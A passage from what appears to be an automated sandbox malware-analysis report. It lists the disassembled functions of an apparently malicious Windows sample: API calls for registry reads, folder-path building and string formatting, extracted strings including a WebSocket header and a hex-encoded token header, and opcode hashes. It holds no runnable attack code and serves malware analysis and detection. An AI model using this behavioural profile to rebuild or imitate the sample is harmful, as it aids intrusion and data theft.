                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 726dfc3eb533e19bb6e9fcec1c552818522ed6d561929606bcc503b5d788d82a
                                • Instruction ID: 9b7efe538f80fe8421409cfdb9e8c5d3a4a673a1c37af63b817742197832d065
                                • Opcode Fuzzy Hash: 726dfc3eb533e19bb6e9fcec1c552818522ed6d561929606bcc503b5d788d82a
                                • Instruction Fuzzy Hash: B421E4B1518301AF8750DF69D88585FBBF9EFC9254F408A1EF599D3220E730E6098BA6
                                Function 00C93130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C93166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C9316D
                                • RegOpenKeyExA.ADVAPI32(80000002,0178B7F8,00000000,00020119,?), ref: 00C9318C
                                • RegQueryValueExA.ADVAPI32(?,0179DDF0,00000000,00000000,00000000,000000FF), ref: 00C931A7
                                • RegCloseKey.ADVAPI32(?), ref: 00C931B1
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 5872976ba6b34cd10b056e491f1eed506a10a5bc4eae7db697faf52d5bd8ca74
                                • Instruction ID: cd9f71c8df574f562a913faab61b015e7f3385e80d13486fb35c0e4682ae6bee
                                • Opcode Fuzzy Hash: 5872976ba6b34cd10b056e491f1eed506a10a5bc4eae7db697faf52d5bd8ca74
                                • Instruction Fuzzy Hash: 7F114676A40205AFD710CB95DD45FABB7BCF789711F004119FA05E3640D775690487A1
                                Function 00C990DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 3f7482f90809d845d8a84343c5096230bab186cbfecba35226f5635faa1f414a
                                • Instruction ID: 545bc3a3914f184932627efdbdaff3fad289e477f669083a2cc5981822a8cfa3
                                • Opcode Fuzzy Hash: 3f7482f90809d845d8a84343c5096230bab186cbfecba35226f5635faa1f414a
                                • Instruction Fuzzy Hash: 9241D57050475C9EDF218B298C8DFFB7BF8EB45304F1444ECE99A86182E2719B459F20
                                Function 00C78980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C78996
                                  • Part of subcall function 00C9A1C0: std::exception::exception.LIBCMT ref: 00C9A1D5
                                  • Part of subcall function 00C9A1C0: std::exception::exception.LIBCMT ref: 00C9A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C789CD
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: bfad523fb224bd0716e91e73de8c1edcf0baef2442104d6a09f1a1e8b430f129
                                • Instruction ID: 79f687edefb0d3c288b9e6af12697699e28e972ad0250e976c2fb5a4bcb890d2
                                • Opcode Fuzzy Hash: bfad523fb224bd0716e91e73de8c1edcf0baef2442104d6a09f1a1e8b430f129
                                • Instruction Fuzzy Hash: 5921E7723406508BCB20DA5CE844A6AF7E9DBE17A1B11493FF359CB281CA71DC45D3E5
                                Function 00C78850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C78883
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: f1759c35957300fdc5c1a79f09c7a7b1722d6cdb61e9678dbe300227b7654af1
                                • Instruction ID: 9cd95a9d6994fd73e1e5684c0e8bdce63d4adcf78a9b6b56c43990fe5ceb2428
                                • Opcode Fuzzy Hash: f1759c35957300fdc5c1a79f09c7a7b1722d6cdb61e9678dbe300227b7654af1
                                • Instruction Fuzzy Hash: 8031BBB5E005159FCB08DF58C8956ADBBB6EB88350F14C269EA19DF384DB30AD01CBD1
                                Function 00C95910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95922
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95935
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 0a9ed5d59fe62e2afb165c03e30a272f74d2675a9afd1d41d9b45fb8203f923c
                                • Instruction ID: 3a8b535b3d8618384da5dcb4efaeb4e5c8e2db5c0214e384338dc12211658d90
                                • Opcode Fuzzy Hash: 0a9ed5d59fe62e2afb165c03e30a272f74d2675a9afd1d41d9b45fb8203f923c
                                • Instruction Fuzzy Hash: BF115231304B50CBEB328F2CF80471977E1ABD2B61F260A6DE0E187695D761D943D7A5
                                Function 00C93CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00C9A430,000000FF), ref: 00C93D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C93D27
                                • wsprintfA.USER32 ref: 00C93D37
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: ee7f23894622614aa44a37b2d66238f027b191889897096db7dd5b044c90ac57
                                • Instruction ID: 768d635ea7a8690fc05abf11ff0fa09a1652f2dcd38311d2874ebac2cad3ec5a
                                • Opcode Fuzzy Hash: ee7f23894622614aa44a37b2d66238f027b191889897096db7dd5b044c90ac57
                                • Instruction Fuzzy Hash: 1501D271644304BFE7105B56DC8EF6BBB78FB4ABA1F004115FA05AB2D0CBB42904C7A1
                                Function 00C78710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C78737
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A188
                                  • Part of subcall function 00C9A173: std::exception::exception.LIBCMT ref: 00C9A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 97260b5bcfad407e779ab0541d396203edeec8fc09eb3ef51971c68a13fcab91
                                • Instruction ID: 8381916ee26406f78965a0b8dd1698071eab2b10ffc1f1e72dd1bc33ad63e444
                                • Opcode Fuzzy Hash: 97260b5bcfad407e779ab0541d396203edeec8fc09eb3ef51971c68a13fcab91
                                • Instruction Fuzzy Hash: 3AF09037B800220F8318643E8D8845EA94657E53A033AD725FA1EEF299EC70EC8695D5
                                Function 00C8E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8E544
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E573
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E581
                                • lstrcat.KERNEL32(?,0179DE90), ref: 00C8E59C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: f5d52413793b0e090a387956890e5a4b682c40442b20d573fef9e7f56bdb56d9
                                • Instruction ID: 834792dd436388a46a4e0d0b8c2febac426f8fad47dca7edd4c692bfe3d7dd5c
                                • Opcode Fuzzy Hash: f5d52413793b0e090a387956890e5a4b682c40442b20d573fef9e7f56bdb56d9
                                • Instruction Fuzzy Hash: 7251B875A10108AFCB54EB64DC46EEE33BDFB8D310F048468B91997241DE70BF449BA0
                                Function 00C91FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00C91FDF, 00C91FF5, 00C920B7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 21e5ed05852d24e409ebbf630726f3a2dc5bbc3fec31f076972b9092b533c67b
                                • Instruction ID: 7c43566680c37cf069d771d56137e2984ae032665de441c4ed891bfeb9c9d545
                                • Opcode Fuzzy Hash: 21e5ed05852d24e409ebbf630726f3a2dc5bbc3fec31f076972b9092b533c67b
                                • Instruction Fuzzy Hash: 1F217C39510289AFCF20EB76C84C7DDF767DFC0361F846056C8A90B241E3720A0AD796
                                Function 00C8EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8EBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8EBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8EBF1
                                • lstrcat.KERNEL32(?,0179EF00), ref: 00C8EC0C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
